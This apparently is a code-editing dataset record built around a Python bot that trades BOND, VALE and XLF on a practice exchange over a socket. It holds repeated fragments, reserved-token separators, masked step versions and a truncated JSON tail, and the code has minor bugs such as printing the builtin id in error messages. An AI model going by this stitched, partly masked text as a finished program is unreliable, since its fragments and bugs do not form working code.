elif positions['XLF'] - pending_sell_orders['XLF'] > -100:
global xlf_sell_pending_id
if xlf_sell_pending_id:
print('Cancel XLF Order: ' + str(orders_placed))
cancel(xlf_sell_pending_id)
pending_sell_orders['XLF'] = 0
xlf_sell_pending_id = None
time.sleep(1)
add('XLF', 'SELL', xlf_sell - 1, 100 + positions['XLF'])
xlf_sell_pending_id = orders_placed
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((exchange_hostname, port))
return s.makefile('rw', 1)
def write_to_exchange(exchange, obj):
json.dump(obj, exchange)
exchange.write('\n')
def read_from_exchange(exchange):
return json.loads(exchange.readline())
<|reserved_special_token_0|>
def hello():
write_to_exchange(exchange, {'type': 'hello', 'team': team_name.upper()})
def add(symbol, direction, price, size):
global orders_placed
orders_placed += 1
global pending_orders
pending_orders.append(orders_placed)
print('Order Placed: ' + str(orders_placed) + ' Position: ' + str(
positions[symbol]) + ' Size: ' + str(size) + ' Dir: ' + direction +
' Symbol: ' + symbol + ' Price: ' + str(price) + '')
if direction == 'BUY':
global pending_buy_orders
pending_buy_orders[symbol] += size
elif direction == 'SELL':
global pending_sell_orders
pending_sell_orders[symbol] += size
write_to_exchange(exchange, {'type': 'add', 'order_id': orders_placed,
'symbol': symbol, 'dir': direction, 'price': price, 'size': size})
read_from_exchange(exchange)
def cancel(order_id):
write_to_exchange(exchange, {'type': 'cancel', 'order_id': order_id})
def listen_for_fills(server_msg):
if server_msg['type'] == 'fill':
order_num = server_msg['order_id']
symbol = server_msg['symbol']
size = server_msg['size']
direction = server_msg['dir']
global positions
if symbol == 'BOND':
if direction == 'BUY':
pending_buy_orders[symbol] -= size
add('BOND', 'SELL', 1001, size)
elif direction == 'SELL':
pending_sell_orders[symbol] -= size
add('BOND', 'BUY', 999, size)
if symbol == 'VALE':
print('Vale Order Filled: ' + str(order_num) + ' ' + direction +
' Size: ' + str(size))
if direction == 'BUY':
pending_buy_orders[symbol] -= size
positions['VALE'] += size
elif direction == 'SELL':
positions['VALE'] -= size
pending_sell_orders[symbol] -= size
if symbol == 'XLF':
print('XLF Order Filled: ' + str(order_num) + ' ' + direction +
' Size: ' + str(size))
if direction == 'BUY':
pending_buy_orders[symbol] -= size
positions['XLF'] += size
elif direction == 'SELL':
positions['XLF'] -= size
pending_sell_orders[symbol] -= size
def listen_for_book(server_msg):
if server_msg['type'] == 'book':
global vale_sell
global vale_buy
global xlf_sell
global xlf_buy
if server_msg['symbol'] == 'VALE':
if len(server_msg['sell']) > 0:
vale_sell = server_msg['sell'][0][0]
if len(server_msg['buy']) > 0:
vale_buy = server_msg['buy'][0][0]
if server_msg['symbol'] == 'XLF':
if len(server_msg['sell']) > 0:
xlf_sell = server_msg['sell'][0][0]
if len(server_msg['buy']) > 0:
xlf_buy = server_msg['buy'][0][0]
<|reserved_special_token_0|>
def buy_sell_xlf():
if xlf_buy > 0 and xlf_sell > 0:
global pending_sell_orders
global pending_buy_orders
if pending_buy_orders['XLF'] + positions['XLF'] < 100:
global xlf_buy_pending_id
if xlf_buy_pending_id:
cancel(xlf_buy_pending_id)
pending_buy_orders['XLF'] = 0
xlf_buy_pending_id = None
print('Cancel XLF Order: ' + str(orders_placed))
time.sleep(1)
add('XLF', 'BUY', xlf_buy + 1, 100 - positions['XLF'])
xlf_buy_pending_id = orders_placed
elif positions['XLF'] - pending_sell_orders['XLF'] > -100:
global xlf_sell_pending_id
if xlf_sell_pending_id:
print('Cancel XLF Order: ' + str(orders_placed))
cancel(xlf_sell_pending_id)
pending_sell_orders['XLF'] = 0
xlf_sell_pending_id = None
time.sleep(1)
add('XLF', 'SELL', xlf_sell - 1, 100 + positions['XLF'])
xlf_sell_pending_id = orders_placed
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((exchange_hostname, port))
return s.makefile('rw', 1)
def write_to_exchange(exchange, obj):
json.dump(obj, exchange)
exchange.write('\n')
def read_from_exchange(exchange):
return json.loads(exchange.readline())
<|reserved_special_token_0|>
def hello():
write_to_exchange(exchange, {'type': 'hello', 'team': team_name.upper()})
def add(symbol, direction, price, size):
global orders_placed
orders_placed += 1
global pending_orders
pending_orders.append(orders_placed)
print('Order Placed: ' + str(orders_placed) + ' Position: ' + str(
positions[symbol]) + ' Size: ' + str(size) + ' Dir: ' + direction +
' Symbol: ' + symbol + ' Price: ' + str(price) + '')
if direction == 'BUY':
global pending_buy_orders
pending_buy_orders[symbol] += size
elif direction == 'SELL':
global pending_sell_orders
pending_sell_orders[symbol] += size
write_to_exchange(exchange, {'type': 'add', 'order_id': orders_placed,
'symbol': symbol, 'dir': direction, 'price': price, 'size': size})
read_from_exchange(exchange)
def cancel(order_id):
write_to_exchange(exchange, {'type': 'cancel', 'order_id': order_id})
def listen_for_fills(server_msg):
if server_msg['type'] == 'fill':
order_num = server_msg['order_id']
symbol = server_msg['symbol']
size = server_msg['size']
direction = server_msg['dir']
global positions
if symbol == 'BOND':
if direction == 'BUY':
pending_buy_orders[symbol] -= size
add('BOND', 'SELL', 1001, size)
elif direction == 'SELL':
pending_sell_orders[symbol] -= size
add('BOND', 'BUY', 999, size)
if symbol == 'VALE':
print('Vale Order Filled: ' + str(order_num) + ' ' + direction +
' Size: ' + str(size))
if direction == 'BUY':
pending_buy_orders[symbol] -= size
positions['VALE'] += size
elif direction == 'SELL':
positions['VALE'] -= size
pending_sell_orders[symbol] -= size
if symbol == 'XLF':
print('XLF Order Filled: ' + str(order_num) + ' ' + direction +
' Size: ' + str(size))
if direction == 'BUY':
pending_buy_orders[symbol] -= size
positions['XLF'] += size
elif direction == 'SELL':
positions['XLF'] -= size
pending_sell_orders[symbol] -= size
def listen_for_book(server_msg):
if server_msg['type'] == 'book':
global vale_sell
global vale_buy
global xlf_sell
global xlf_buy
if server_msg['symbol'] == 'VALE':
if len(server_msg['sell']) > 0:
vale_sell = server_msg['sell'][0][0]
if len(server_msg['buy']) > 0:
vale_buy = server_msg['buy'][0][0]
if server_msg['symbol'] == 'XLF':
if len(server_msg['sell']) > 0:
xlf_sell = server_msg['sell'][0][0]
if len(server_msg['buy']) > 0:
xlf_buy = server_msg['buy'][0][0]
<|reserved_special_token_0|>
def buy_sell_xlf():
if xlf_buy > 0 and xlf_sell > 0:
global pending_sell_orders
global pending_buy_orders
if pending_buy_orders['XLF'] + positions['XLF'] < 100:
global xlf_buy_pending_id
if xlf_buy_pending_id:
cancel(xlf_buy_pending_id)
pending_buy_orders['XLF'] = 0
xlf_buy_pending_id = None
print('Cancel XLF Order: ' + str(orders_placed))
time.sleep(1)
add('XLF', 'BUY', xlf_buy + 1, 100 - positions['XLF'])
xlf_buy_pending_id = orders_placed
elif positions['XLF'] - pending_sell_orders['XLF'] > -100:
global xlf_sell_pending_id
if xlf_sell_pending_id:
print('Cancel XLF Order: ' + str(orders_placed))
cancel(xlf_sell_pending_id)
pending_sell_orders['XLF'] = 0
xlf_sell_pending_id = None
time.sleep(1)
add('XLF', 'SELL', xlf_sell - 1, 100 + positions['XLF'])
xlf_sell_pending_id = orders_placed
def listen_for_errors(server_msg):
if server_msg['type'] == 'reject':
print('ERROR: ORDER FAILED, id: ' + str(server_msg['order_id']) +
' ' + server_msg['error'])
if server_msg['type'] == 'error':
print('ERROR: ORDER FAILED, id: ' + str(id) + ' ' + server_msg['error']
)
if server_msg['type'] == 'ack':
print('Order Completed: ' + str(server_msg['order_id']))
if server_msg['type'] == 'out':
print('Order Successfully Canceled: ' + str(server_msg['order_id']))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#!/usr/bin/python
# ~~~~~============== HOW TO RUN ==============~~~~~
# 1) Configure things in CONFIGURATION section
# 2) Change permissions: chmod +x bot.py
# 3) Run in loop: while true; do ./bot.py; sleep 1; done
from __future__ import print_function
import sys
import socket
import json
import time
# ~~~~~============== CONFIGURATION ==============~~~~~
# replace REPLACEME with your team name!
team_name="BULBASAUR"
# This variable dictates whether or not the bot is connecting to the prod
# or test exchange. Be careful with this switch!
test_mode = True
# This setting changes which test exchange is connected to.
# 0 is prod-like
# 1 is slower
# 2 is empty
test_exchange_index=0
prod_exchange_hostname="production"
port=25000 + (test_exchange_index if test_mode else 0)
exchange_hostname = "test-exch-" + team_name if test_mode else prod_exchange_hostname
# ~~~~~============== NETWORKING CODE ==============~~~~~
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((exchange_hostname, port))
return s.makefile('rw', 1)
def write_to_exchange(exchange, obj):
json.dump(obj, exchange)
exchange.write("\n")
def read_from_exchange(exchange):
return json.loads(exchange.readline())
# ~~~~~============== MAIN LOOP ==============~~~~~
exchange = None
orders_placed = 0
pending_orders = []
pending_buy_orders = {"BOND": 0, "VALBZ": 0, "VALE": 0, "XLF": 0}
pending_sell_orders = {"BOND": 0, "VALBZ": 0, "VALE": 0, "XLF": 0}
positions = {"BOND": 0, "VALBZ": 0, "VALE": 0, "XLF": 0}
vale_buy_pending_id = None
vale_sell_pending_id = None
vale_sell = 0
vale_buy = 0
xlf_buy_pending_id = None
xlf_sell_pending_id = None
xlf_sell = 0
xlf_buy = 0
def main():
global exchange
exchange = connect()
hello()
hello_from_exchange = read_from_exchange(exchange)
# A common mistake people make is to call write_to_exchange() > 1
# time for every read_from_exchange() response.
# Since many write messages generate marketdata, this will cause an
# exponential explosion in pending messages. Please, don't do that!
print("The exchange replied:", hello_from_exchange, file=sys.stderr)
global positions
positions["BOND"] = hello_from_exchange["symbols"][0]["position"]
positions["VALE"] = hello_from_exchange["symbols"][5]["position"]
positions["VALBZ"] = hello_from_exchange["symbols"][4]["position"]
positions["XLF"] = hello_from_exchange["symbols"][7]["position"]
add("BOND", "BUY", 999, 100 - positions["BOND"])
add("BOND", "SELL", 1001, 100 + positions["BOND"])
while (True):
server_msg = read_from_exchange(exchange)
buy_sell_vale()
buy_sell_xlf()
listen_for_fills(server_msg)
listen_for_book(server_msg)
listen_for_errors(server_msg)
def hello():
write_to_exchange(exchange, {"type": "hello", "team": team_name.upper()})
def add(symbol, direction, price, size):
# Update order id to be order placed number
global orders_placed
orders_placed += 1
# Add to pending orders list
global pending_orders
pending_orders.append(orders_placed)
#if symbol == "VALE":
print("Order Placed: " + str(orders_placed) + " Position: " + str(positions[symbol])+ " Size: " + str(size) + " Dir: " + direction + " Symbol: " + symbol + " Price: " + str(price) + "")
# Increment Buy Orders If Necessary
if (direction == "BUY"):
global pending_buy_orders
pending_buy_orders[symbol] += size
elif (direction == "SELL"):
global pending_sell_orders
pending_sell_orders[symbol] += size
# Add order to exchange
write_to_exchange(exchange, {"type": "add", "order_id": orders_placed, "symbol": symbol,
"dir":direction, "price":price, "size": size })
#
read_from_exchange(exchange)
def cancel(order_id):
write_to_exchange(exchange, {"type": "cancel", "order_id": order_id})
def listen_for_fills(server_msg):
if (server_msg["type"] == "fill"):
# Get info of filled order
order_num = server_msg["order_id"]
symbol = server_msg["symbol"]
size = server_msg["size"]
direction = server_msg["dir"]
global positions
# Update bond order fill and buy/sell as necessary
if (symbol == "BOND"):
# print("Bond Order Partially Filled: " + str(order_num))
if (direction == "BUY"):
pending_buy_orders[symbol] -= size
add("BOND", "SELL", 1001, size)
elif (direction == "SELL"):
pending_sell_orders[symbol] -= size
add("BOND", "BUY", 999, size)
# Update Vale Order fill and hedge as necessary
if (symbol == "VALE"):
print("Vale Order Filled: " + str(order_num) + " " + direction + " Size: " + str(size))
if (direction == "BUY"):
pending_buy_orders[symbol] -= size
positions["VALE"] += size
elif (direction == "SELL"):
positions["VALE"] -= size
pending_sell_orders[symbol] -= size
if (symbol == "XLF"):
print("XLF Order Filled: " + str(order_num) + " " + direction + " Size: " + str(size))
if (direction == "BUY"):
pending_buy_orders[symbol] -= size
positions["XLF"] += size
elif (direction == "SELL"):
positions["XLF"] -= size
pending_sell_orders[symbol] -= size
def listen_for_book(server_msg):
if (server_msg["type"] == "book"):
global vale_sell
global vale_buy
global xlf_sell
global xlf_buy
if (server_msg["symbol"] == "VALE"):
if len(server_msg["sell"]) > 0:
vale_sell = server_msg["sell"][0][0]
if len(server_msg["buy"]) > 0:
vale_buy = server_msg["buy"][0][0]
if (server_msg["symbol"] == "XLF"):
if len(server_msg["sell"]) > 0:
xlf_sell = server_msg["sell"][0][0]
if len(server_msg["buy"]) > 0:
xlf_buy = server_msg["buy"][0][0]
def buy_sell_vale():
if vale_buy > 0 and vale_sell > 0:
global pending_sell_orders
global pending_buy_orders
if ( pending_buy_orders["VALE"] + positions["VALE"] < 10):
global vale_buy_pending_id
if vale_buy_pending_id:
cancel(vale_buy_pending_id)
pending_buy_orders["VALE"] = 0
vale_buy_pending_id = None
print("Cancel VALE BUY Order: " + str(orders_placed))
time.sleep(1)
num_stock = 10 - positions["VALE"]
add("VALE", "BUY", vale_buy + 1, 10 - positions["VALE"])
vale_buy_pending_id = orders_placed
elif (positions["VALE"] - pending_sell_orders["VALE"] > -10):
global vale_sell_pending_id
if vale_sell_pending_id:
print("Cancel VALE Sell Order: " + str(orders_placed))
cancel(vale_sell_pending_id)
pending_sell_orders["VALE"] = 0
vale_sell_pending_id = None
time.sleep(1)
num_stock = 10 - positions["VALE"]
add("VALE", "SELL", vale_sell - 1, num_stock)
vale_sell_pending_id = orders_placed
def buy_sell_xlf():
if xlf_buy > 0 and xlf_sell > 0:
global pending_sell_orders
global pending_buy_orders
if ( pending_buy_orders["XLF"] + positions["XLF"] < 100):
global xlf_buy_pending_id
if xlf_buy_pending_id:
cancel(xlf_buy_pending_id)
pending_buy_orders["XLF"] = 0
xlf_buy_pending_id = None
print("Cancel XLF Order: " + str(orders_placed))
time.sleep(1)
add("XLF", "BUY", xlf_buy + 1, 100 - positions["XLF"])
xlf_buy_pending_id = orders_placed
elif (positions["XLF"] - pending_sell_orders["XLF"] > -100):
global xlf_sell_pending_id
if xlf_sell_pending_id:
print("Cancel XLF Order: " + str(orders_placed))
cancel(xlf_sell_pending_id)
pending_sell_orders["XLF"] = 0
xlf_sell_pending_id = None
time.sleep(1)
add("XLF", "SELL", xlf_sell - 1, 100 + positions["XLF"])
xlf_sell_pending_id = orders_placed
def listen_for_errors(server_msg):
if (server_msg["type"] == "reject"):
print("ERROR: ORDER FAILED, id: " + str(server_msg["order_id"]) + " " + server_msg["error"])
if (server_msg["type"] == "error"):
print("ERROR: ORDER FAILED, id: " + str(id) + " " + server_msg["error"])
if (server_msg["type"] == "ack"):
print("Order Completed: " + str(server_msg["order_id"]))
if (server_msg["type"] == "out"):
print("Order Successfully Canceled: " + str(server_msg["order_id"]))
#add("BOND", "BUY", 999, 100 - positions["BOND"])
#add("BOND", "SELL", 1001, 100 + positions["BOND"])
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "56c5c515de8490f2e3516563e037c375aba03667",
"index": 3221,
"step-1": "<mask token>\n\n\ndef connect():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((exchange_hostname, port))\n return s.makefile('rw', 1)\n\n\ndef write_to_exchange(exchange, obj):\n json.dump(obj, exchange)\n exchange.write('\\n')\n\n\n<mask token>\n\n\ndef hello():\n write_to_exchange(exchange, {'type': 'hello', 'team': team_name.upper()})\n\n\ndef add(symbol, direction, price, size):\n global orders_placed\n orders_placed += 1\n global pending_orders\n pending_orders.append(orders_placed)\n print('Order Placed: ' + str(orders_placed) + ' Position: ' + str(\n positions[symbol]) + ' Size: ' + str(size) + ' Dir: ' + direction +\n ' Symbol: ' + symbol + ' Price: ' + str(price) + '')\n if direction == 'BUY':\n global pending_buy_orders\n pending_buy_orders[symbol] += size\n elif direction == 'SELL':\n global pending_sell_orders\n pending_sell_orders[symbol] += size\n write_to_exchange(exchange, {'type': 'add', 'order_id': orders_placed,\n 'symbol': symbol, 'dir': direction, 'price': price, 'size': size})\n read_from_exchange(exchange)\n\n\n<mask token>\n\n\ndef buy_sell_xlf():\n if xlf_buy > 0 and xlf_sell > 0:\n global pending_sell_orders\n global pending_buy_orders\n if pending_buy_orders['XLF'] + positions['XLF'] < 100:\n global xlf_buy_pending_id\n if xlf_buy_pending_id:\n cancel(xlf_buy_pending_id)\n pending_buy_orders['XLF'] = 0\n xlf_buy_pending_id = None\n print('Cancel XLF Order: ' + str(orders_placed))\n time.sleep(1)\n add('XLF', 'BUY', xlf_buy + 1, 100 - positions['XLF'])\n xlf_buy_pending_id = orders_placed\n elif positions['XLF'] - pending_sell_orders['XLF'] > -100:\n global xlf_sell_pending_id\n if xlf_sell_pending_id:\n print('Cancel XLF Order: ' + str(orders_placed))\n cancel(xlf_sell_pending_id)\n pending_sell_orders['XLF'] = 0\n xlf_sell_pending_id = None\n time.sleep(1)\n add('XLF', 'SELL', xlf_sell - 1, 100 + positions['XLF'])\n xlf_sell_pending_id = orders_placed\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef connect():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((exchange_hostname, port))\n return s.makefile('rw', 1)\n\n\ndef write_to_exchange(exchange, obj):\n json.dump(obj, exchange)\n exchange.write('\\n')\n\n\ndef read_from_exchange(exchange):\n return json.loads(exchange.readline())\n\n\n<mask token>\n\n\ndef hello():\n write_to_exchange(exchange, {'type': 'hello', 'team': team_name.upper()})\n\n\ndef add(symbol, direction, price, size):\n global orders_placed\n orders_placed += 1\n global pending_orders\n pending_orders.append(orders_placed)\n print('Order Placed: ' + str(orders_placed) + ' Position: ' + str(\n positions[symbol]) + ' Size: ' + str(size) + ' Dir: ' + direction +\n ' Symbol: ' + symbol + ' Price: ' + str(price) + '')\n if direction == 'BUY':\n global pending_buy_orders\n pending_buy_orders[symbol] += size\n elif direction == 'SELL':\n global pending_sell_orders\n pending_sell_orders[symbol] += size\n write_to_exchange(exchange, {'type': 'add', 'order_id': orders_placed,\n 'symbol': symbol, 'dir': direction, 'price': price, 'size': size})\n read_from_exchange(exchange)\n\n\ndef cancel(order_id):\n write_to_exchange(exchange, {'type': 'cancel', 'order_id': order_id})\n\n\ndef listen_for_fills(server_msg):\n if server_msg['type'] == 'fill':\n order_num = server_msg['order_id']\n symbol = server_msg['symbol']\n size = server_msg['size']\n direction = server_msg['dir']\n global positions\n if symbol == 'BOND':\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n add('BOND', 'SELL', 1001, size)\n elif direction == 'SELL':\n pending_sell_orders[symbol] -= size\n add('BOND', 'BUY', 999, size)\n if symbol == 'VALE':\n print('Vale Order Filled: ' + str(order_num) + ' ' + direction +\n ' Size: ' + str(size))\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n positions['VALE'] += size\n elif direction == 'SELL':\n positions['VALE'] -= size\n pending_sell_orders[symbol] -= size\n if symbol == 'XLF':\n print('XLF Order Filled: ' + str(order_num) + ' ' + direction +\n ' Size: ' + str(size))\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n positions['XLF'] += size\n elif direction == 'SELL':\n positions['XLF'] -= size\n pending_sell_orders[symbol] -= size\n\n\n<mask token>\n\n\ndef buy_sell_xlf():\n if xlf_buy > 0 and xlf_sell > 0:\n global pending_sell_orders\n global pending_buy_orders\n if pending_buy_orders['XLF'] + positions['XLF'] < 100:\n global xlf_buy_pending_id\n if xlf_buy_pending_id:\n cancel(xlf_buy_pending_id)\n pending_buy_orders['XLF'] = 0\n xlf_buy_pending_id = None\n print('Cancel XLF Order: ' + str(orders_placed))\n time.sleep(1)\n add('XLF', 'BUY', xlf_buy + 1, 100 - positions['XLF'])\n xlf_buy_pending_id = orders_placed\n elif positions['XLF'] - pending_sell_orders['XLF'] > -100:\n global xlf_sell_pending_id\n if xlf_sell_pending_id:\n print('Cancel XLF Order: ' + str(orders_placed))\n cancel(xlf_sell_pending_id)\n pending_sell_orders['XLF'] = 0\n xlf_sell_pending_id = None\n time.sleep(1)\n add('XLF', 'SELL', xlf_sell - 1, 100 + positions['XLF'])\n xlf_sell_pending_id = orders_placed\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef connect():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((exchange_hostname, port))\n return s.makefile('rw', 1)\n\n\ndef write_to_exchange(exchange, obj):\n json.dump(obj, exchange)\n exchange.write('\\n')\n\n\ndef read_from_exchange(exchange):\n return json.loads(exchange.readline())\n\n\n<mask token>\n\n\ndef hello():\n write_to_exchange(exchange, {'type': 'hello', 'team': team_name.upper()})\n\n\ndef add(symbol, direction, price, size):\n global orders_placed\n orders_placed += 1\n global pending_orders\n pending_orders.append(orders_placed)\n print('Order Placed: ' + str(orders_placed) + ' Position: ' + str(\n positions[symbol]) + ' Size: ' + str(size) + ' Dir: ' + direction +\n ' Symbol: ' + symbol + ' Price: ' + str(price) + '')\n if direction == 'BUY':\n global pending_buy_orders\n pending_buy_orders[symbol] += size\n elif direction == 'SELL':\n global pending_sell_orders\n pending_sell_orders[symbol] += size\n write_to_exchange(exchange, {'type': 'add', 'order_id': orders_placed,\n 'symbol': symbol, 'dir': direction, 'price': price, 'size': size})\n read_from_exchange(exchange)\n\n\ndef cancel(order_id):\n write_to_exchange(exchange, {'type': 'cancel', 'order_id': order_id})\n\n\ndef listen_for_fills(server_msg):\n if server_msg['type'] == 'fill':\n order_num = server_msg['order_id']\n symbol = server_msg['symbol']\n size = server_msg['size']\n direction = server_msg['dir']\n global positions\n if symbol == 'BOND':\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n add('BOND', 'SELL', 1001, size)\n elif direction == 'SELL':\n pending_sell_orders[symbol] -= size\n add('BOND', 'BUY', 999, size)\n if symbol == 'VALE':\n print('Vale Order Filled: ' + str(order_num) + ' ' + direction +\n ' Size: ' + str(size))\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n positions['VALE'] += size\n elif direction == 'SELL':\n positions['VALE'] -= size\n pending_sell_orders[symbol] -= size\n if symbol == 'XLF':\n print('XLF Order Filled: ' + str(order_num) + ' ' + direction +\n ' Size: ' + str(size))\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n positions['XLF'] += size\n elif direction == 'SELL':\n positions['XLF'] -= size\n pending_sell_orders[symbol] -= size\n\n\ndef listen_for_book(server_msg):\n if server_msg['type'] == 'book':\n global vale_sell\n global vale_buy\n global xlf_sell\n global xlf_buy\n if server_msg['symbol'] == 'VALE':\n if len(server_msg['sell']) > 0:\n vale_sell = server_msg['sell'][0][0]\n if len(server_msg['buy']) > 0:\n vale_buy = server_msg['buy'][0][0]\n if server_msg['symbol'] == 'XLF':\n if len(server_msg['sell']) > 0:\n xlf_sell = server_msg['sell'][0][0]\n if len(server_msg['buy']) > 0:\n xlf_buy = server_msg['buy'][0][0]\n\n\n<mask token>\n\n\ndef buy_sell_xlf():\n if xlf_buy > 0 and xlf_sell > 0:\n global pending_sell_orders\n global pending_buy_orders\n if pending_buy_orders['XLF'] + positions['XLF'] < 100:\n global xlf_buy_pending_id\n if xlf_buy_pending_id:\n cancel(xlf_buy_pending_id)\n pending_buy_orders['XLF'] = 0\n xlf_buy_pending_id = None\n print('Cancel XLF Order: ' + str(orders_placed))\n time.sleep(1)\n add('XLF', 'BUY', xlf_buy + 1, 100 - positions['XLF'])\n xlf_buy_pending_id = orders_placed\n elif positions['XLF'] - pending_sell_orders['XLF'] > -100:\n global xlf_sell_pending_id\n if xlf_sell_pending_id:\n print('Cancel XLF Order: ' + str(orders_placed))\n cancel(xlf_sell_pending_id)\n pending_sell_orders['XLF'] = 0\n xlf_sell_pending_id = None\n time.sleep(1)\n add('XLF', 'SELL', xlf_sell - 1, 100 + positions['XLF'])\n xlf_sell_pending_id = orders_placed\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef connect():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((exchange_hostname, port))\n return s.makefile('rw', 1)\n\n\ndef write_to_exchange(exchange, obj):\n json.dump(obj, exchange)\n exchange.write('\\n')\n\n\ndef read_from_exchange(exchange):\n return json.loads(exchange.readline())\n\n\n<mask token>\n\n\ndef hello():\n write_to_exchange(exchange, {'type': 'hello', 'team': team_name.upper()})\n\n\ndef add(symbol, direction, price, size):\n global orders_placed\n orders_placed += 1\n global pending_orders\n pending_orders.append(orders_placed)\n print('Order Placed: ' + str(orders_placed) + ' Position: ' + str(\n positions[symbol]) + ' Size: ' + str(size) + ' Dir: ' + direction +\n ' Symbol: ' + symbol + ' Price: ' + str(price) + '')\n if direction == 'BUY':\n global pending_buy_orders\n pending_buy_orders[symbol] += size\n elif direction == 'SELL':\n global pending_sell_orders\n pending_sell_orders[symbol] += size\n write_to_exchange(exchange, {'type': 'add', 'order_id': orders_placed,\n 'symbol': symbol, 'dir': direction, 'price': price, 'size': size})\n read_from_exchange(exchange)\n\n\ndef cancel(order_id):\n write_to_exchange(exchange, {'type': 'cancel', 'order_id': order_id})\n\n\ndef listen_for_fills(server_msg):\n if server_msg['type'] == 'fill':\n order_num = server_msg['order_id']\n symbol = server_msg['symbol']\n size = server_msg['size']\n direction = server_msg['dir']\n global positions\n if symbol == 'BOND':\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n add('BOND', 'SELL', 1001, size)\n elif direction == 'SELL':\n pending_sell_orders[symbol] -= size\n add('BOND', 'BUY', 999, size)\n if symbol == 'VALE':\n print('Vale Order Filled: ' + str(order_num) + ' ' + direction +\n ' Size: ' + str(size))\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n positions['VALE'] += size\n elif direction == 'SELL':\n positions['VALE'] -= size\n pending_sell_orders[symbol] -= size\n if symbol == 'XLF':\n print('XLF Order Filled: ' + str(order_num) + ' ' + direction +\n ' Size: ' + str(size))\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n positions['XLF'] += size\n elif direction == 'SELL':\n positions['XLF'] -= size\n pending_sell_orders[symbol] -= size\n\n\ndef listen_for_book(server_msg):\n if server_msg['type'] == 'book':\n global vale_sell\n global vale_buy\n global xlf_sell\n global xlf_buy\n if server_msg['symbol'] == 'VALE':\n if len(server_msg['sell']) > 0:\n vale_sell = server_msg['sell'][0][0]\n if len(server_msg['buy']) > 0:\n vale_buy = server_msg['buy'][0][0]\n if server_msg['symbol'] == 'XLF':\n if len(server_msg['sell']) > 0:\n xlf_sell = server_msg['sell'][0][0]\n if len(server_msg['buy']) > 0:\n xlf_buy = server_msg['buy'][0][0]\n\n\n<mask token>\n\n\ndef buy_sell_xlf():\n if xlf_buy > 0 and xlf_sell > 0:\n global pending_sell_orders\n global pending_buy_orders\n if pending_buy_orders['XLF'] + positions['XLF'] < 100:\n global xlf_buy_pending_id\n if xlf_buy_pending_id:\n cancel(xlf_buy_pending_id)\n pending_buy_orders['XLF'] = 0\n xlf_buy_pending_id = None\n print('Cancel XLF Order: ' + str(orders_placed))\n time.sleep(1)\n add('XLF', 'BUY', xlf_buy + 1, 100 - positions['XLF'])\n xlf_buy_pending_id = orders_placed\n elif positions['XLF'] - pending_sell_orders['XLF'] > -100:\n global xlf_sell_pending_id\n if xlf_sell_pending_id:\n print('Cancel XLF Order: ' + str(orders_placed))\n cancel(xlf_sell_pending_id)\n pending_sell_orders['XLF'] = 0\n xlf_sell_pending_id = None\n time.sleep(1)\n add('XLF', 'SELL', xlf_sell - 1, 100 + positions['XLF'])\n xlf_sell_pending_id = orders_placed\n\n\ndef listen_for_errors(server_msg):\n if server_msg['type'] == 'reject':\n print('ERROR: ORDER FAILED, id: ' + str(server_msg['order_id']) +\n ' ' + server_msg['error'])\n if server_msg['type'] == 'error':\n print('ERROR: ORDER FAILED, id: ' + str(id) + ' ' + server_msg['error']\n )\n if server_msg['type'] == 'ack':\n print('Order Completed: ' + str(server_msg['order_id']))\n if server_msg['type'] == 'out':\n print('Order Successfully Canceled: ' + str(server_msg['order_id']))\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/python\n\n# ~~~~~============== HOW TO RUN ==============~~~~~\n# 1) Configure things in CONFIGURATION section\n# 2) Change permissions: chmod +x bot.py\n# 3) Run in loop: while true; do ./bot.py; sleep 1; done\n\nfrom __future__ import print_function\n\nimport sys\nimport socket\nimport json\nimport time\n\n# ~~~~~============== CONFIGURATION ==============~~~~~\n# replace REPLACEME with your team name!\nteam_name=\"BULBASAUR\"\n# This variable dictates whether or not the bot is connecting to the prod\n# or test exchange. Be careful with this switch!\ntest_mode = True\n\n# This setting changes which test exchange is connected to.\n# 0 is prod-like\n# 1 is slower\n# 2 is empty\ntest_exchange_index=0\nprod_exchange_hostname=\"production\"\n\nport=25000 + (test_exchange_index if test_mode else 0)\nexchange_hostname = \"test-exch-\" + team_name if test_mode else prod_exchange_hostname\n\n# ~~~~~============== NETWORKING CODE ==============~~~~~\ndef connect():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((exchange_hostname, port))\n return s.makefile('rw', 1)\n\ndef write_to_exchange(exchange, obj):\n json.dump(obj, exchange)\n exchange.write(\"\\n\")\n\ndef read_from_exchange(exchange):\n return json.loads(exchange.readline())\n\n\n# ~~~~~============== MAIN LOOP ==============~~~~~\nexchange = None\norders_placed = 0\npending_orders = []\npending_buy_orders = {\"BOND\": 0, \"VALBZ\": 0, \"VALE\": 0, \"XLF\": 0}\npending_sell_orders = {\"BOND\": 0, \"VALBZ\": 0, \"VALE\": 0, \"XLF\": 0}\npositions = {\"BOND\": 0, \"VALBZ\": 0, \"VALE\": 0, \"XLF\": 0}\nvale_buy_pending_id = None\nvale_sell_pending_id = None\nvale_sell = 0\nvale_buy = 0\n\nxlf_buy_pending_id = None\nxlf_sell_pending_id = None\nxlf_sell = 